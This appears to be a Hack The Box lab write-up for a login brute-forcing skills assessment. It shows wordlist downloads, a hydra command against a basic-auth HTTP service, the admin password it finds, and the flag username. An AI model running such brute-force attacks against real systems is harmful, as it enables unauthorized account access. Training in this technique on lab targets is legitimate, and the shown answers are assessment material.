LOGIN BRUTE FORCING 1 & 2

OBJECTIVE: brute-force the the target instance and upon successful identification of the login username, proceed to skills assessment part 2.

What is the password for the basic auth login?
#download username lists
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/top-usernames-shortlist.txt

#download password lists
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/2023-200_most_used_passwords.txt

root@htb:~$ hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt 83.136.250.185 http-get / -s 57229 -t 64
 * 57229][http-get] host: 83.136.250.185   login: admin   password: Admin123
 
root@htb:~$ curl -u admin:'Admin123' 83.136.250.185:57229
 * <p>This is the username you will need for part 2 of the Skills Assessment<span class="flag">satwossh</span></p>

After successfully brute forcing the login, what is the username you have been given for the next part of the skills assessment?

What is the username of the ftp user you find via brute-forcing?

What is the flag contained within flag.txt

Last updated